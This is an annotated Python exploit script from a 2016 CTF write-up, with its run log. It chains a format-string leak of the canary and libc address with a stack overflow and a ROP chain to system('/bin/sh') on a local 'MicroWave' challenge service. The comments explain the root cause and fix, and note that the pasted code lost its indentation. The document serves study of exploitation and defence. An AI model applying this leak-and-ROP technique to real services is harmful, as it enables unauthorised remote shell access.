- #!/usr/bin/python
- # CTF exploit script (Python 2: print statements) from an Insomni'hack 2016
- # write-up against a "MicroWave" service. It chains two weaknesses the
- # service exposes: a format-string bug in the username field, whose leaked
- # stack values defeat the stack canary and ASLR, and a stack buffer overflow
- # behind menu option 2, finished with a short ROP chain into libc.
- # Defender's view: the root cause is an unsanitised user string presumably
- # reaching a printf-style call; printing it through a fixed format ("%s")
- # removes the leak, and without the leak the canary and ASLR would have
- # stopped the overflow from being turned into a crash-free control transfer.
- # NOTE(review): the lines under `try:` carry no indentation in this paste,
- # so the file as shown will not parse; the indent was presumably stripped.
- from pwn import *
- proc = connect("127.0.0.1",6642)
- # Format-string probe: nine "%p" conversions, dot-separated so the echoed
- # stack values can be split apart below.
- user = "%p.%p.%p.%p.%p.%p.%p.%p.%p"
- passw = "n07_7h3_fl46"
- try:
- print proc.readuntil(":")
- proc.sendline("1")
- print proc.recvuntil("username:")
- proc.sendline(user)
- print proc.recvuntil("password:")
- proc.sendline(passw)
- #print proc.recv()
- # Read the service's echo of the username; [11::] drops a fixed-length
- # prefix (presumably the text before the first "%p" value -- verify against
- # the service's output) and the split yields nine pointers as hex strings.
- data = proc.recvuntil(":")[11::].split('.')
- print ' '.join(data)
- # Positions are tied to this binary's stack layout at the format-string
- # call: index 5 is taken as the stack canary, index 1 as a libc pointer,
- # index 8 as what the log labels a code (program image) pointer.
- # code_addr is only logged, and code_offset below is assigned but never used.
- canary = data[5]
- libc_leak = data[1]
- code_addr = data[8]
- log.info("Code leak address %s",code_addr)
- log.info("Canary address %s",canary)
- log.info("Libc address %s",libc_leak)
- # Hard-coded offsets: they match only the exact binary/libc build the
- # challenge shipped and are not portable to other builds.
- code_offset = 0x179a010
- libc_offset = 0xf66e0
- libc_base = int(libc_leak,16) - libc_offset
- log.info("Libc base address %s",hex(libc_base))
- # Menu option 2 ("Edit your tweet" in the banner) is where the overflowing
- # input is accepted; the service prompts with "#>" before reading it.
- proc.sendline("2")
- print proc.recvuntil("#>")
- #sleep(40)
- g1 = libc_base + 0x0000000000021102 # pop rdi ; ret
- # Overflow layout: 1032 bytes of filler up to the canary slot, the leaked
- # canary value (intended to pass the stack-protector check), 8 bytes for
- # the saved frame pointer, then the return address slot holds the chain.
- payload = 1032 * "A"
- payload += p64(int(canary,16))
- payload += "B" * 8
- # libc addresses for the call system("/bin/sh"); offsets are build-specific.
- bin_sh = libc_base + 0x18c178
- system = libc_base + 0x45390
- log.info("/bin/sh address %s", hex(bin_sh))
- log.info("system address %s",hex(system))
- log.info("Gadget address %s",hex(g1))
- # ROP chain (x86-64 SysV: first argument in rdi): "pop rdi ; ret" loads the
- # "/bin/sh" pointer, then control passes to system. Only existing libc code
- # runs, which is why a non-executable stack alone does not stop this.
- payload += p64(g1) #pop rdi ;ret
- payload += p64(bin_sh)
- payload += p64(system)
- payload += "B" * 8
- #sleep(40)
- proc.sendline(payload)
- proc.interactive()
- # Swallowing EOFError hides a closed connection (e.g. the service aborting
- # on a canary mismatch); logging it would make a failed run distinguishable.
- except EOFError:
- pass
- xothed@xoth:~/CTF/Insomni2016$ python micexp.py
- [+] Opening connection to 127.0.0.1 on port 6642: Done
- --------------------------------------------------------
- | Welcome to the next generation of MicroWaves! |
- | *** |
- | This stylish Microwave with Grill function, includes |
- | a function that tweets your favourite food! |
- | *** |
- --------------------------------------------------------
- ----------------------------------
- | 1. Connect to Twitter account |
- | 2. Edit your tweet |
- | 3. Grill & Tweet your food |
- | q. Exit |
- ----------------------------------
- [MicroWave]:
- Log in on Twitter:
- username:
- password:
- 0x7f06d832e780 0x7f06d805f6e0 0x7f06d852c700 0xa (nil) 0xa024f8f28952e700 0x7f06d832d708 0x7f06d832d710 0x55fec783f010
- Twitter account
- ----------------------------------
- | 1 Connect to Twitter account |
- | 2 Edit your tweet |
- | 3 Grill & Tweet your food |
- | q Exit |
- ----------------------------------
- [MicroWave]:
- [*] Code leak address 0x55fec783f010
- Twitter account
- [*] Canary address 0xa024f8f28952e700
- [*] Libc address 0x7f06d805f6e0
- [*] Libc base address 0x7f06d7f69000
- #>
- [*] /bin/sh address 0x7f06d80f5178
- [*] system address 0x7f06d7fae390
- [*] Gadget address 0x7f06d7f8a102
- [*] Switching to interactive mode
- Done.
- $ [*] Got EOF while reading in interactive
- $ ls
- [*] Closed connection to 127.0.0.1 port 6642
- [*] Got EOF while sending in interactive